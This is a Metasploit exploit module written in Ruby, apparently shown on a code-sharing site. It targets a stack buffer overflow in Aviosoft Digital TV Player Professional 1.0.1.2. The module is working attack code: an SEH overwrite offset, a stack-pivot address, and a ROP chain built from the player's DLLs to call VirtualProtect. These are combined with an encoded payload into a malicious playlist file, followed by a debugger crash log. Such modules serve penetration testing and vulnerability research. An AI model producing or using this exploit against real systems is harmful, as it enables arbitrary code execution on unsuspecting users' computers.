Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",

16
        'Description' => %q{

17
          This module exploits a vulnerability found in Aviosoft Digital TV Player

18
          Pro version 1.x.  An overflow occurs when the process copies the content of a

19
          playlist file on to the stack, which may result arbitrary code execution under

20
          the context of the user.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'modpr0be', # Initial discovery, poc

25
          'sinn3r', # Metasploit

26
        ],

27
        'References' => [

28
          ['OSVDB', '77043'],

29
          ['EDB', '18096'],

30
        ],

31
        'Payload' => {

32
          'BadChars' => "\x00\x0a\x1a",

33
          'StackAdjustment' => -3500,

34
        },

35
        'DefaultOptions' => {

36
          'EXITFUNC' => "seh",

37
        },

38
        'Platform' => 'win',

39
        'Targets' => [

40
          [

41
            'Aviosoft DTV Player 1.0.1.2',

42
            {

43
              'Ret' => 0x6130534a, # Stack pivot (ADD ESP,800; RET)

44
              'Offset' => 612, # Offset to SEH

45
              'Max' => 5000 # Max buffer size

46
            }

47
          ],

48
        ],

49
        'Privileged' => false,

50
        'DisclosureDate' => '2011-11-09',

51
        'DefaultTarget' => 0,

52
        'Notes' => {

53
          'Reliability' => UNKNOWN_RELIABILITY,

54
          'Stability' => UNKNOWN_STABILITY,

55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

56
        }

57
      )

58
    )

59


60
    register_options(

61
      [

62
        OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf'])

63
      ]

64
    )

65
  end

66


67
  def junk(n = 1)

68
    return [rand_text_alpha(4).unpack("L")[0]] * n

69
  end

70


71
  def nops(rop = false, n = 1)

72
    return rop ? [0x61326003] * n : [0x90909090] * n

73
  end

74


75
  def exploit

76
    rop = [

77
      nops(true, 10),  # ROP NOP

78
      0x6405347a,      # POP EDX # RETN (MediaPlayerCtrl.dll)

79
      0x10011108,      # ptr to &VirtualProtect

80
      0x64010503,      # PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll)

81
      junk,

82
      0x6160949f,      # MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll)

83
      junk(3),

84
      0x61604218,      # PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll)

85
      junk(3),

86
      0x6403d1a6,      # POP EBP # RETN (MediaPlayerCtrl.dll)

87
      junk(3),

88
      0x60333560,      # & push esp #  ret 0c (Configuration.dll)

89
      0x61323EA8,      # POP EAX # RETN (DTVDeviceManager.dll)

90
      0xA13977DF,      # 0x00000343-> ebx

91
      0x640203fc,      # ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)

92
      0x6163d37b,      # PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll)

93
      0x61626807,      # XOR EAX,EAX # RETN (EPG.dll)

94
      0x640203fc,      # ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)

95
      0x6405347a,      # POP EDX # RETN (MediaPlayerCtrl.dll)

96
      0xA13974DC,      # 0x00000040-> edx

97
      0x613107fb,      # ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll)

98
      0x60326803,      # POP ECX # RETN (Configuration.dll)

99
      0x60350340,      # &Writable location

100
      0x61329e07,      # POP EDI # RETN (DTVDeviceManager.dll)

101
      nops(true),      # ROP NOP

102
      0x60340178,      # POP EAX # RETN

103
      nops,            # Regular NOPs

104
      0x60322e02       # PUSH # RETN

105
    ].flatten.pack("V*")

106


107
    buf = ''

108
    buf << rand_text_alpha(target['Offset'] - buf.length)

109
    buf << [target.ret].pack('V*')

110
    buf << rand_text_alpha(136)

111
    buf << rop

112
    buf << make_nops(32)

113
    buf << payload.encoded

114
    buf << rand_text_alpha(target['Max'] - buf.length)

115


116
    file_create(buf)

117
  end

118
end

119


120
=begin

121
eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000

122
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0         nv up ei pl nz na pe nc

123
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

124
MediaPlayerCtrl!DllCreateObject+0x220:

125
6400f6f0 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

126
0:000> !exchain

127
0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll

128
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll -

129
DTVDeviceManager+534a (6130534a)

130
Invalid exception stack at 41414141

131
0:000> !address edi

132
    00130000 : 00130000 - 00003000

133
                    Type     00040000 MEM_MAPPED

134
                    Protect  00000002 PAGE_READONLY

135
                    State    00001000 MEM_COMMIT

136
                    Usage    RegionUsageIsVAD

137
0:000> !address esi

138
    047a0000 : 047a0000 - 0000b000

139
                    Type     00020000 MEM_PRIVATE

140
                    Protect  00000004 PAGE_READWRITE

141
                    State    00001000 MEM_COMMIT

142
                    Usage    RegionUsageHeap

143
                    Handle   013c0000

144
=end

145


146